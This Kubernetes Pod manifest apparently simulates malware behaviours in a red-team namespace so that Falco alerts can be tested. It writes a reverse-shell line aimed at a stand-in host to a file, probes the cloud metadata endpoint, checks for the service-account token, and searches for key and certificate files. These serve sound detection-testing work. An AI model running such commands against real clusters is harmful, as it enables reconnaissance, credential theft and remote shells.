# ═══════════════════════════════════════════════════════════════════════════════
# SYNTHETIC WORKLOAD: Fake Malware Pod
# Purpose: Train detection systems with simulated malicious behavior
# Target: Red Team cluster (red-team)
# WARNING: This contains NO real malware - only simulated behaviors
# ═══════════════════════════════════════════════════════════════════════════════
---
apiVersion: v1
kind: Pod
metadata:
  name: fake-malware-pod
  namespace: red-team
  labels:
    app: fake-malware
    attack-type: malware-simulation
    strategickhaos.io/synthetic: "true"
  annotations:
    strategickhaos.io/description: "Simulates malware behaviors for detection training"
    strategickhaos.io/expected-result: "Should trigger Falco alerts"
    strategickhaos.io/behaviors: "reverse-shell-simulation, crypto-simulation, recon"
spec:
  containers:
    - name: fake-malware
      image: alpine:latest
      command:
        - sh
        - -c
        - |
          echo "╔══════════════════════════════════════════════════════════╗"
          echo "║  SYNTHETIC MALWARE SIMULATION - NOT REAL MALWARE         ║"
          echo "║  Purpose: Train Blue Team detection systems              ║"
          echo "╚══════════════════════════════════════════════════════════╝"
          
          # ═══════════════════════════════════════════════════════════════
          # SIMULATION 1: Reverse Shell Pattern (no actual connection)
          # ═══════════════════════════════════════════════════════════════
          echo ""
          echo "=== SIMULATION 1: Reverse Shell Pattern ==="
          echo "Simulating command that looks like reverse shell..."
          # This pattern should trigger Falco
          echo "bash -i >& /dev/tcp/fake.invalid/4444 0>&1" > /tmp/fake_revshell.txt
          echo "Pattern written to file (not executed)"
          
          # ═══════════════════════════════════════════════════════════════
          # SIMULATION 2: Crypto Miner Pattern (no actual mining)
          # ═══════════════════════════════════════════════════════════════
          echo ""
          echo "=== SIMULATION 2: Crypto Miner Pattern ==="
          echo "Creating file with miner-like name..."
          touch /tmp/xmrig-simulation
          echo "stratum+tcp://fake.pool.invalid:3333" > /tmp/fake_pool.txt
          echo "Pattern created (no actual miner)"
          
          # ═══════════════════════════════════════════════════════════════
          # SIMULATION 3: Reconnaissance Activity
          # ═══════════════════════════════════════════════════════════════
          echo ""
          echo "=== SIMULATION 3: Reconnaissance ==="
          echo "Gathering system information..."
          uname -a
          cat /etc/os-release
          cat /proc/version
          env | head -20
          
          # ═══════════════════════════════════════════════════════════════
          # SIMULATION 4: Token Access Pattern
          # ═══════════════════════════════════════════════════════════════
          echo ""
          echo "=== SIMULATION 4: Token Access Pattern ==="
          echo "Attempting to read service account token..."
          if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ]; then
            echo "Token file exists (contents not displayed)"
            wc -c /var/run/secrets/kubernetes.io/serviceaccount/token
          else
            echo "Token file not mounted"
          fi
          
          # ═══════════════════════════════════════════════════════════════
          # SIMULATION 5: Network Probing Pattern
          # ═══════════════════════════════════════════════════════════════
          echo ""
          echo "=== SIMULATION 5: Network Probing ==="
          echo "Testing network access..."
          # Probe metadata service (should fail or be blocked)
          wget -q -O /dev/null --timeout=2 http://169.254.169.254/ && \
            echo "Metadata service accessible" || \
            echo "Metadata service blocked"
          
          # ═══════════════════════════════════════════════════════════════
          # SIMULATION 6: File System Exploration
          # ═══════════════════════════════════════════════════════════════
          echo ""
          echo "=== SIMULATION 6: Filesystem Exploration ==="
          echo "Searching for sensitive files..."
          find / -name "*.key" -o -name "*.pem" -o -name "*.crt" 2>/dev/null | head -10
          
          # ═══════════════════════════════════════════════════════════════
          # SIMULATION 7: Process Spawning Pattern
          # ═══════════════════════════════════════════════════════════════
          echo ""
          echo "=== SIMULATION 7: Process Spawning ==="
          echo "Spawning child processes..."
          for i in 1 2 3; do
            sleep 1 &
          done
          echo "Child processes spawned: $(pgrep -c sleep)"
          
          echo ""
          echo "╔══════════════════════════════════════════════════════════╗"
          echo "║  SIMULATION COMPLETE                                     ║"
          echo "║  Check Blue Team Falco logs for alerts                   ║"
          echo "╚══════════════════════════════════════════════════════════╝"
          
          # Keep running for inspection
          echo ""
          echo "Pod will stay alive for 1 hour for inspection..."
          sleep 3600
      resources:
        limits:
          cpu: "100m"
          memory: "64Mi"
        requests:
          cpu: "50m"
          memory: "32Mi"
      securityContext:
        allowPrivilegeEscalation: false
        readOnlyRootFilesystem: false
        runAsNonRoot: true
        runAsUser: 1000
  restartPolicy: Never
